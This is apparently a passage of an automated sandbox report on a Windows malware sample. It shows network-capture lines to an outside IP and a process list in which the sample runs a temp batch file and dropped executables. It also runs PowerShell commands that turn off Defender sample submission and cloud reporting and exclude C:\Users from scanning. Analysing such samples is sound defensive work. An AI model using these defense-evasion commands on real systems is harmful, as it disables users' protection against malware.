Sep 24, 2024 17:46:13.239151001 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.239160061 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.242583036 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.242635012 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.242660999 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.242674112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.242707014 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.242785931 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.242796898 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.242860079 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.242901087 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.242913961 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.242944002 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.243243933 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.243256092 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.243268967 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.243304968 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.243376970 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.243397951 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.243413925 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.243419886 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.243432045 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.243448019 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.243458033 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.243484974 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.243619919 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.243710041 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.243721962 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.243733883 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.243742943 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.243755102 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.243771076 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.243781090 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.243815899 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.243963003 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244043112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244055986 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244069099 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244080067 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.244090080 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244106054 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.244112968 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244152069 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.244462967 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244473934 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244487047 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244508028 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.244515896 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244529009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244540930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244554043 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.244563103 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244573116 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.244584084 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244618893 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.244734049 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244827032 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244839907 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244853973 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244863987 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.244874954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244888067 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.244896889 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244916916 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.244927883 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.247234106 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.247270107 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.247277975 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.247289896 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.247315884 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.247428894 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.247442007 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.247452974 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.247463942 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.247493029 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.247524023 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.247535944 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.247976065 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.248008013 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.248035908 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.248045921 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.248080015 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.248172998 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.248184919 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.248197079 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.248209000 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.248218060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.248255014 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.248711109 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.248723030 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.248735905 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.248758078 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.248859882 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.248872042 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.248884916 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.248897076 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.248905897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.248927116 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.249015093 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.249027014 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.249038935 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.249049902 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.249061108 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.249080896 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.249206066 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.249217987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.249228954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.249241114 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.249269962 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.250293016 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.250324011 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.250338078 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.250361919 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.250495911 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.250509024 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.250520945 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.250530958 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.250543118 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.250562906 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.261091948 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261106014 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261120081 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261156082 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.261182070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261197090 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261204004 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.261214972 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261228085 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.261235952 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261272907 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.261313915 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261387110 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261399031 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261409998 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261420965 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.261430979 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261450052 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.261646032 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261658907 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261682987 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.261852026 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261862993 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261892080 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.261909962 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261920929 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261934996 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261948109 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.261959076 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261970043 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.261991024 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.262008905 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.309293985 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.309308052 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.309319973 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.309393883 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.309420109 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.309437037 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.309448957 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.309463978 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.309468985 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.309493065 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.341437101 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.341545105 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.341566086 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.341578960 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.341710091 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.341749907 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.341762066 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.341783047 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.341794968 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.341826916 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.341887951 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.346529961 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.346543074 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.346556902 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.346605062 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.346630096 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.346640110 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.346652985 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.346664906 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.346673965 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.346688986 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.346694946 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.346724033 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.346883059 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.346894979 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.346906900 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.346920013 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.346941948 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.346951008 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.346965075 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.346975088 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.346987009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347001076 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347008944 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.347034931 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.347189903 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347296000 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347309113 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347320080 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347330093 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.347340107 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347349882 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.347358942 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347371101 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347393990 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347399950 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.347410917 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347429991 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.347676992 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347688913 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347703934 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347723007 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.347748041 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.347887993 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347899914 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347910881 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347925901 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347938061 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.347946882 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347961903 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.347968102 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.347978115 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.348006010 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.348133087 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.348170042 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.348189116 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.348203897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.348236084 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.348565102 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.348576069 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.348588943 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.348602057 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.348613024 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.348639011 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.352015972 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.352027893 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.352041006 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.352093935 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.352142096 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.352153063 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.352165937 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.352180958 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.352186918 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.352210045 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.352350950 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.352389097 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.352480888 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.352492094 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.352543116 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.352639914 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.352652073 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.352662086 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.352674007 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.352686882 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.352720022 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.352751017 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.352895975 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.352933884 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.353008986 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.353020906 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.353032112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.353045940 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.353058100 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.353064060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.353075981 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.353085041 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.353095055 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.353106976 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.353115082 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.353148937 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.353282928 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.353363991 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.353374004 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.353387117 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.353400946 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.353406906 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.353419065 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.355326891 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.355338097 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.355350971 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.355413914 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.355448961 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.355458975 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.355470896 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.355483055 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.355688095 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.375037909 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.375060081 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.375077009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.375111103 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.375135899 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.375174046 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.375312090 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.375329971 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.375344992 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.375358105 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.375368118 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.375396013 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.375497103 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.375509024 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.375521898 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.375535011 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.375544071 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.375554085 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.375566006 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.375577927 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.375587940 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.375605106 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.375612020 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.375622988 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.375637054 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.376044035 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.376056910 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.376070976 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.376082897 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.376105070 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.402276993 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.402307987 CEST11204973064.95.13.143192.168.2.4

Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Click to jump to process

Target ID:0
Start time:11:46:03
Start date:24/09/2024
Path:C:\Users\user\Desktop\file.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\file.exe"
Imagebase:0x400000
File size:11'950'592 bytes
MD5 hash:54A1448DF6E33D7032232DD1D896BC68
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Reputation:low
Has exited:true

Target ID:1
Start time:11:46:04
Start date:24/09/2024
Path:C:\Users\user\Desktop\file.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\Desktop\file.exe
Imagebase:0x400000
File size:11'950'592 bytes
MD5 hash:54A1448DF6E33D7032232DD1D896BC68
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Reputation:low
Has exited:false

Target ID:2
Start time:11:46:07
Start date:24/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\tskowkhh962esyo3x0.bat"
Imagebase:0x7ff75d060000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:11:46:07
Start date:24/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:11:46:07
Start date:24/09/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:11:46:08
Start date:24/09/2024
Path:C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe"
Imagebase:0x7ff73afb0000
File size:98'304 bytes
MD5 hash:319865D78CC8DF6270E27521B8182BFF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:7
Start time:11:46:16
Start date:24/09/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:11:46:19
Start date:24/09/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:11:46:23
Start date:24/09/2024
Path:C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe"
Imagebase:0x7ff6ce980000
File size:10'639'360 bytes
MD5 hash:7D1755E8E41A6C2F08D2FAEFFDF9DAD1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
